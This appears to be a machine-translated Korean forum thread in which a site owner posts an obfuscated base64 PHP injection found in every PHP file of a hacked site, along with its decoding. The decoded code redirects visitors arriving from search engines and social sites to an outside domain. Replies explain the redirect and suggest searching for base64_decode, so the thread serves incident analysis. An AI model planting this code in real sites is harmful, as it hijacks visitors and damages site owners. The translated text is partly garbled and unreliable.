2012-03-03 2 views
3

이 2월 14일 내 웹 사이트가 2월 29일 그러나 모든 PHP 파일이 검사에서 악성 코드에 영향을있어 한에 구글의 조치 후 내 통지에 관해서 몇 가지 악성 코드에 의해 공격있어 내가이 악성 코드로부터 얼마나 많이 잃었습니까?

이 에코 다음 코드를 가지고 base64_decode ("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmV mZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9 "); 이

error_reporting은 디코딩되기에

(0); $ qazplm = headers_sent(); if (! $ qazplm) { $ referer = $ _SERVER [ 'HTTP_REFERER']; $ uag = $ _SERVER [ 'HTTP_USER_AGENT'];if ($ uag) { (stristr ($ referer, "yahoo") 또는 stristr ($ referer, "bing") 또는 stristr ($ referer, "rambler") 또는 stristr ($ referer, "gogo") 또는 stristr ($ referer, "live.com") 또는 stristr ($ referer, "nigma") 또는 stristr ($ referer, "webalta") 또는 stristr ($ referer, prestaller ($ referer, "bit.ly") 또는 stristr ($ referer, "tinyurl.com") 또는 preg_match ("/ 시작일") 또는 stristr ($ referer, "stumbleupon.com") .re/yandsearch \? \ & lr \ =/", $ referer) 또는 preg_match ("/ google. (? *)/url/", $ referer) 또는 stristr ($ referer, ) "myspace.com") 또는 stristr ($ referer, "facebook.com") 또는 stristr ($ referer, "aol.com")) { if (! stristr ($ referer, "cache") 또는! stristr ($ referer, "inurl")) { header ("Location : http://namesti.bee.pl/"); exit(); } } }} 내가 내 서버에 들어 왔지만 모든 PHP 파일이 영향을 받았습니다했지만 다른 사람들이 fine.entire 웹 사이트가 지금 다운 얼마나 잘 모릅니다

. 나는 그것이 얼마나 많은 피해를 줄 수 있는지 알고 싶다. 그리고이 코드가 정확히 무엇을하는지 알고 싶다. 어떻게 탐지 할 수 있습니까? 그것은 특정 시간에 실행 스크립트입니다.

+0

리퍼러가 검색 엔진 및 소셜 네트워킹 사이트 목록 인 경우이 코드는이 namesti 사이트로 302 리디렉션을 수행합니다. 효과적으로 DoS. 모든 PHP에서'base64_decode'를 검색하십시오. 그러나 가장 중요한 문제는 처음부터 해킹이 어떻게 발생했는지입니다. 이것은 단지 "PHP 사이트를 잠그는 방법"이라고 할 수 있습니다. – TerryE

+0

아아, 오래된 기지 64 공격, 그것은 내 친구를 포함하여 많은 사람들에게 일어 났지만 피해는 인간이 아닌 봇에 의해 이루어진 것처럼 그렇게 심각하지 않았습니다. – Zoidberg

+0

이 링크는 http://www.thonky.com/how-to/prevent-base-64-decode-hack/에 도움이 될 수 있습니다. – Zoidberg

답변

4

이 스크립트는 헤더가 이미 보내 졌는지 여부와 referer 문자열에 포함 된 내용에 따라 namesti.bee.pl으로 리디렉션하려고합니다.

다른 조치를 취하지 않으므로 피해는 사이트의 명성에 달려 있습니다.

관련 문제